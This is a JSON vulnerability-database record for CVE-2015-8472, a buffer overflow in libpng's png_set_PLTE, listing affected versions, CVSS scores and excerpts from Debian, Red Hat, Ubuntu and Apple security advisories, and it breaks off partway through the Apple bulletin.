"trust": 1.0,
"vendor": "libpng",
"version": "1.2.19"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.13"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.23"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.34"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.5.19"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.6.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.37"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
},
{
"db": "NVD",
"id": "CVE-2015-8472"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "135555"
},
{
"db": "PACKETSTORM",
"id": "135556"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "134720"
},
{
"db": "PACKETSTORM",
"id": "134722"
},
{
"db": "PACKETSTORM",
"id": "137932"
}
],
"trust": 0.6
},
"cve": "CVE-2015-8472",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-8472",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-86433",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2015-8472",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-8472",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201512-189",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-86433",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-8472",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86433"
},
{
"db": "VULMON",
"id": "CVE-2015-8472"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-189"
},
{
"db": "NVD",
"id": "CVE-2015-8472"
}
]
},
"description": {
"_id": null,
"data": "Buffer overflow in the png_set_PLTE function in libpng before 1.0.65, 1.1.x and 1.2.x before 1.2.55, 1.3.x, 1.4.x before 1.4.18, 1.5.x before 1.5.25, and 1.6.x before 1.6.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-8126. The following versions are affected: libpng prior to 1.0.65, 1.1.x and 1.2.x prior to 1.2.55, 1.3.x, 1.4.x prior to 1.4.18, 1.5.x prior to 1.5.25, 1.6 1.6.x versions prior to .20. \nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2015-8472\n\n It was discovered that the original fix for CVE-2015-8126 was\n incomplete and did not detect a potential overrun by applications\n using png_set_PLTE directly. A remote attacker can take advantage of\n this flaw to cause a denial of service (application crash). \n\nCVE-2015-8540\n\n Xiao Qixue and Chen Yu discovered a flaw in the png_check_keyword\n function. A remote attacker can potentially take advantage of this\n flaw to cause a denial of service (application crash). \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.2.49-1+deb7u2. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.2.50-2+deb8u2. 7) - x86_64\n\n3. Description:\n\nIBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment\nand the IBM Java Software Development Kit. \n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Further information\nabout these flaws can be found on the IBM Java Security alerts page, listed\nin the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981,\nCVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448,\nCVE-2016-0466, CVE-2016-0483, CVE-2016-0494)\n\nNote: This update also disallows the use of the MD5 hash algorithm in the\ncertification path processing. The use of MD5 can be re-enabled by removing\nMD5 from the jdk.certpath.disabledAlgorithms security property defined in\nthe java.security file. All running\ninstances of IBM Java must be restarted for the update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123\n1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions\n1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)\n1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword()\n1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)\n1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)\n1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)\n1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)\n1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)\n1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods\n\n6. ============================================================================\nUbuntu Security Notice USN-2861-1\nJanuary 06, 2016\n\nlibpng vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nlibpng could be made to crash or run programs as your login if it opened a\nspecially crafted file. (CVE-2015-8540)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n libpng12-0 1.2.51-0ubuntu3.15.10.2\n\nUbuntu 15.04:\n libpng12-0 1.2.51-0ubuntu3.15.04.2\n\nUbuntu 14.04 LTS:\n libpng12-0 1.2.50-1ubuntu2.14.04.2\n\nUbuntu 12.04 LTS:\n libpng12-0 1.2.46-3ubuntu4.2\n\nAfter a standard system update you need to restart your session to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libpng security update\nAdvisory ID: RHSA-2015:2594-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2594.html\nIssue date: 2015-12-09\nCVE Names: CVE-2015-7981 CVE-2015-8126 CVE-2015-8472 \n=====================================================================\n\n1. Summary:\n\nUpdated libpng packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which\ngive detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe libpng packages contain a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files. \n\nIt was discovered that the png_get_PLTE() and png_set_PLTE() functions of\nlibpng did not correctly calculate the maximum palette sizes for bit depths\nof less than 8. In case an application tried to use these functions in\ncombination with properly calculated palette sizes, this could lead to a\nbuffer overflow or out-of-bounds reads. An attacker could exploit this to\ncause a crash or potentially execute arbitrary code by tricking an\nunsuspecting user into processing a specially crafted PNG image. However,\nthe exact impact is dependent on the application using the library. \n(CVE-2015-8126, CVE-2015-8472)\n\nAn array-indexing error was discovered in the png_convert_to_rfc1123()\nfunction of libpng. An attacker could possibly use this flaw to cause an\nout-of-bounds read by tricking an unsuspecting user into processing a\nspecially crafted PNG image. (CVE-2015-7981)\n\nAll libpng users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123\n1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nlibpng-1.2.49-2.el6_7.src.rpm\n\ni386:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\n\nx86_64:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-1.2.49-2.el6_7.x86_64.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\nlibpng-static-1.2.49-2.el6_7.i686.rpm\n\nx86_64:\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.x86_64.rpm\nlibpng-static-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nlibpng-1.2.49-2.el6_7.src.rpm\n\nx86_64:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-1.2.49-2.el6_7.x86_64.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.x86_64.rpm\nlibpng-static-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nlibpng-1.2.49-2.el6_7.src.rpm\n\ni386:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\n\nppc64:\nlibpng-1.2.49-2.el6_7.ppc.rpm\nlibpng-1.2.49-2.el6_7.ppc64.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.ppc.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.ppc64.rpm\nlibpng-devel-1.2.49-2.el6_7.ppc.rpm\nlibpng-devel-1.2.49-2.el6_7.ppc64.rpm\n\ns390x:\nlibpng-1.2.49-2.el6_7.s390.rpm\nlibpng-1.2.49-2.el6_7.s390x.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.s390.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.s390x.rpm\nlibpng-devel-1.2.49-2.el6_7.s390.rpm\nlibpng-devel-1.2.49-2.el6_7.s390x.rpm\n\nx86_64:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-1.2.49-2.el6_7.x86_64.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-static-1.2.49-2.el6_7.i686.rpm\n\nppc64:\nlibpng-debuginfo-1.2.49-2.el6_7.ppc64.rpm\nlibpng-static-1.2.49-2.el6_7.ppc64.rpm\n\ns390x:\nlibpng-debuginfo-1.2.49-2.el6_7.s390x.rpm\nlibpng-static-1.2.49-2.el6_7.s390x.rpm\n\nx86_64:\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-static-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nlibpng-1.2.49-2.el6_7.src.rpm\n\ni386:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\n\nx86_64:\nlibpng-1.2.49-2.el6_7.i686.rpm\nlibpng-1.2.49-2.el6_7.x86_64.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-devel-1.2.49-2.el6_7.i686.rpm\nlibpng-devel-1.2.49-2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nlibpng-debuginfo-1.2.49-2.el6_7.i686.rpm\nlibpng-static-1.2.49-2.el6_7.i686.rpm\n\nx86_64:\nlibpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm\nlibpng-static-1.2.49-2.el6_7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-7981\nhttps://access.redhat.com/security/cve/CVE-2015-8126\nhttps://access.redhat.com/security/cve/CVE-2015-8472\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWaENsXlSAg2UNWIIRAoUpAJ9Nlo47EQRO6dLZCmTorScK3JsMfACdF3ZW\n1H8Hq0Bx4u9dJmTNDBAMHS8=\n=fXjS\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805,\nCVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842,\nCVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872,\nCVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903,\nCVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126,\nCVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376,\nCVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494,\nCVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427,\nCVE-2016-3443, CVE-2016-3449)\n\nRed Hat would like to thank Andrea Palazzo of Truel IT for reporting the\nCVE-2015-4806 issue. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. This\nissue was addressed with improved validation. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. This issue was addressed by updating to\nversion 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to 